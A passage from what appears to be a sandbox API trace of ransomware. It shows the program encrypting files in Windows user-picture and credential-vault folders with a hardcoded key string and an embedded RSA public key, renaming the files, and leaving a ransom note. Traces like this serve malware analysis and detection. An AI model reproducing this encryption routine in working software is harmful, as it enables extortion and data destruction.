(lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png", dwFileAttributes=0x80) returned 0 [0240.557] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.558] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.558] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png.gsg", dwFileAttributes=0x2) returned 0 [0240.559] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.561] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.561] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.561] CryptHashData (hHash=0x28e88b8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.561] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e88b8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e8578) returned 1 [0240.561] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.561] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.561] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f7998) returned 1 [0240.562] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7998, dwCertEncodingType=0x1, pInfo=0x2904e68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2904e98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2904ea0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e70f8) returned 1 [0240.562] CryptEncrypt (in: hKey=0x28e70f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.562] CryptEncrypt (in: hKey=0x28e70f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f84c0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f84c0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.562] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f84c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.562] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.562] CryptEncrypt (in: hKey=0x28e8578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.563] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.563] CloseHandle (hObject=0xffffffff) returned 1 [0240.563] CloseHandle (hObject=0xffffffff) returned 1 [0240.563] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png"), bFailIfExists=0) returned 0 [0240.570] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png", dwFileAttributes=0x0) returned 0 [0240.571] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.gsg")) returned 0 [0240.571] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.fuck")) returned 0 [0240.572] CryptDestroyHash (hHash=0x28e88b8) returned 1 [0240.572] CryptDestroyKey (hKey=0x28e8578) returned 1 [0240.572] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.572] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.572] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.572] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.572] GetLastError () returned 0x5 [0240.572] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp")) returned 0x20 [0240.573] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", dwFileAttributes=0x80) returned 0 [0240.573] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.573] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.574] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.gsg", dwFileAttributes=0x2) returned 0 [0240.574] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.577] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.577] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.577] CryptHashData (hHash=0x28e88b8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.577] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e88b8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e8638) returned 1 [0240.577] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.577] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.577] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f8438) returned 1 [0240.577] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8438, dwCertEncodingType=0x1, pInfo=0x2904bf8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2904c28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2904c30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e71f8) returned 1 [0240.578] CryptEncrypt (in: hKey=0x28e71f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.578] CryptEncrypt (in: hKey=0x28e71f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f8658*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f8658*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.578] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f8658, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.578] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.578] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.578] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.578] CloseHandle (hObject=0xffffffff) returned 1 [0240.578] CloseHandle (hObject=0xffffffff) returned 1 [0240.578] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), bFailIfExists=0) returned 0 [0240.587] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", dwFileAttributes=0x0) returned 0 [0240.587] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.gsg")) returned 0 [0240.588] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.fuck")) returned 0 [0240.589] CryptDestroyHash (hHash=0x28e88b8) returned 1 [0240.589] CryptDestroyKey (hKey=0x28e8638) returned 1 [0240.589] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.589] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.589] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.589] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.589] GetLastError () returned 0x5 [0240.589] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png")) returned 0x20 [0240.589] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png", dwFileAttributes=0x80) returned 0 [0240.591] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.591] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.591] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png.gsg", dwFileAttributes=0x2) returned 0 [0240.592] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.594] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.594] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.594] CryptHashData (hHash=0x28e88b8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.594] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e88b8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e8638) returned 1 [0240.595] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.595] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.595] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f86e0) returned 1 [0240.595] CryptImportPublicKeyInfo (in: hCryptProv=0x28f86e0, dwCertEncodingType=0x1, pInfo=0x2905758*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905788*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905790*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e6d78) returned 1 [0240.595] CryptEncrypt (in: hKey=0x28e6d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.595] CryptEncrypt (in: hKey=0x28e6d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f8218*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f8218*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.596] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f8218, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.596] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.596] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.596] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.596] CloseHandle (hObject=0xffffffff) returned 1 [0240.596] CloseHandle (hObject=0xffffffff) returned 1 [0240.596] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png"), bFailIfExists=0) returned 0 [0240.605] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png", dwFileAttributes=0x0) returned 0 [0240.605] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png.gsg")) returned 0 [0240.606] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png.fuck")) returned 0 [0240.607] CryptDestroyHash (hHash=0x28e88b8) returned 1 [0240.607] CryptDestroyKey (hKey=0x28e8638) returned 1 [0240.607] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.607] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.607] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.607] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.607] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\User Account Pictures\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\readme_back_files.htm")) returned 0x20 [0240.608] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.608] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e88b8 [0240.608] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.608] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.608] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e84f8 [0240.608] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.608] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.608] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.609] GetLastError () returned 0x12 [0240.609] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch")) returned 0x20 [0240.609] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", dwFileAttributes=0x80) returned 0 [0240.609] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.610] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.610] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg", dwFileAttributes=0x2) returned 0 [0240.611] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f8548) returned 1 [0240.613] CryptCreateHash (in: hProv=0x28f8548, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.613] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.614] CryptHashData (hHash=0x28e8578, pbData=0x2857218, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.614] CryptDeriveKey (in: hProv=0x28f8548, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e6fb8) returned 1 [0240.614] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.614] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.614] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f8a10) returned 1 [0240.614] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8a10, dwCertEncodingType=0x1, pInfo=0x2905d08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905d38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905d40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e6af8) returned 1 [0240.614] CryptEncrypt (in: hKey=0x28e6af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.615] CryptEncrypt (in: hKey=0x28e6af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f85d0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f85d0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.615] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f85d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.615] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.615] CryptEncrypt (in: hKey=0x28e6fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 